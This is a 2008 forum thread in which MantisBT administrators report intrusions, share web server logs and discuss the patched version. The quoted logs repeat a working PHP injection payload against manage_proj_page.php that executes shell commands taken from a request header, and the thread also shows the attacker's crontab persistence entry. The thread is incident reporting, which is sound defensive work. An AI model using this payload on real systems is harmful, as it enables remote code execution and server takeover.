Hallo
I dont know as, but someone was hacking my server today, and i think he used any security hole in Mantis.
He deleted each entry in my crontab and insert this entry:
* * * * * /path_to_my_webroot/mantis/mc-root/update > /dev/null 2>&1.
This create in mantis-directory a new directory named 'mc-root' with any system-files in it, like:
bash, autorun, cron.d, vhosts etc.
I dont know how critical are the content of these files in a open web-path, but i close the mantis directory directly with a htaccess - deny at all.
Also i delete these cron-entry.
Then I wanted to save the 'mc-root'-dierctory to my local windows-system. But my virus scanner announced a Linux Procfake Virus in a File.
I think sombody used my Mantis Version to upload this virus. One User has registered in Mantis in this time.
Is a user from Spain and i think he will not help to find some bugs in a german plattform.
Does someone know any bug in Mantis with that is this possible?
My version is Mantis 1.1.2
cooper
Security problem?
Moderators: Developer, Contributor
Re: Security problem?
Today I got an email of my provider. In my Mantis-program is a security hole in the file manage_proj_page.php.
The PHP-options allow_url_fopen and allow_url_include were deactivated.
Here ist the logpart:
cooper
The PHP-options allow_url_fopen and allow_url_include were deactivated.
Here ist the logpart:
I hope that is usefull for someone.75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3758 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:15 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 4190 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:20 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3866 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:00:24 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:09 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:11 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3783 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:14 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3794 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:29 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3659 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:39 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3732 "-" "-"
cooper
Re: Security problem?
Got hit by this today as well. Here is the bug report.
I must have missed the CVE report somehow.
http://www.mantisbt.org/bugs/view.php?id=9704
I must have missed the CVE report somehow.
http://www.mantisbt.org/bugs/view.php?id=9704
Re: Security problem?
I've updated to 1.1.5. Today I got a notice that someone unexpected had registered a new account. Looking at httpd logs definitely showed someone was probing and then passing in code:
88.80.193.15 - - [27/Nov/2008:09:17:09 -0500] "GET /mantis/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
88.80.193.15 - - [27/Nov/2008:09:17:10 -0500] "GET /mantis/login_page.php HTTP/1.1" 200 3122 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
...
66.166.99.188 - - [27/Nov/2008:09:17:59 -0500] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
I don't see any evidence that the system's packages have been changed (checked rpm MD5s).
Since I'm running 1.1.5, I'm hopeful that my machine isn't actually compromised. Does anyone know if the above probes would lead to a new user being created without actually allowing the sql injection attack on manage_proj_page.php to succeed?
88.80.193.15 - - [27/Nov/2008:09:17:09 -0500] "GET /mantis/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
88.80.193.15 - - [27/Nov/2008:09:17:10 -0500] "GET /mantis/login_page.php HTTP/1.1" 200 3122 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
...
66.166.99.188 - - [27/Nov/2008:09:17:59 -0500] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
I don't see any evidence that the system's packages have been changed (checked rpm MD5s).
Since I'm running 1.1.5, I'm hopeful that my machine isn't actually compromised. Does anyone know if the above probes would lead to a new user being created without actually allowing the sql injection attack on manage_proj_page.php to succeed?
Re: Security problem?
They have to create a user account first, then the manage_proj_page.php hack will work, but not with 1.1.5. If the hack works, in your httpd error log you will see a file being downloaded at the same time the manage_proj_page.php?sort=']... is called. In addition, the user account of your web server (e.g. apache) will have a crontab entry like the one listed elsewhere in this thread.arenson9 wrote:I've updated to 1.1.5. Today I got a notice that someone unexpected had registered a new account. Looking at httpd logs definitely showed someone was probing and then passing in code:
66.166.99.188 - - [27/Nov/2008:09:17:59 -0500] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
I don't see any evidence that the system's packages have been changed (checked rpm MD5s).
Since I'm running 1.1.5, I'm hopeful that my machine isn't actually compromised. Does anyone know if the above probes would lead to a new user being created without actually allowing the sql injection attack on manage_proj_page.php to succeed?
Re: Security problem?
Hit here today as well. From:
> The following account has been created:
>
> Username: feelings
> E-mail: nebehash@yahoo.com
> Remote IP address: 84.232.166.215 (Romania)
and
> The following account has been created:
>
> Username: edina
> E-mail: mantismail1@gmail.com
> Remote IP address: 85.10.204.17 (Germany)
Two different systems. The logs show no URLs like
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0"
and no cron, so maybe okay.
Not sure how they found one of these systems. The URL is not obvious.
> The following account has been created:
>
> Username: feelings
> E-mail: nebehash@yahoo.com
> Remote IP address: 84.232.166.215 (Romania)
and
> The following account has been created:
>
> Username: edina
> E-mail: mantismail1@gmail.com
> Remote IP address: 85.10.204.17 (Germany)
Two different systems. The logs show no URLs like
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0"
and no cron, so maybe okay.
Not sure how they found one of these systems. The URL is not obvious.